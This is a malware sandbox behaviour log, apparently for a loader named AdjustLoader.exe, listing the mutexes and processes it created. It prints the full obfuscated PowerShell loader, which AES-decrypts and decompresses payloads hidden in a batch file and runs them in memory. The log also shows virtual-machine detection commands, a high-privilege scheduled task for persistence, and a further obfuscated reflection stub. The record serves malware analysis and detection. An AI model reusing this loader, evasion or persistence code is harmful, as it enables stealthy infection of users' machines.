Code function: 62_3_000002295D53CC34 |
62_3_000002295D53CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 62_3_000002295D532398 |
62_3_000002295D532398 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\9539513 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\6624292 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\5549515 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\7506200 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\4353117 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1420 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\b9960528-a89f-46d9-ad7e-4161fbe34b93 |
Source: unknown |
Process created: C:\Users\user\Desktop\AdjustLoader.exe "C:\Users\user\Desktop\AdjustLoader.exe" |
|
Source: C:\Users\user\Desktop\AdjustLoader.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'" |
|
Source: C:\Windows\System32\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F |
|
Source: C:\Windows\System32\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](
117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e |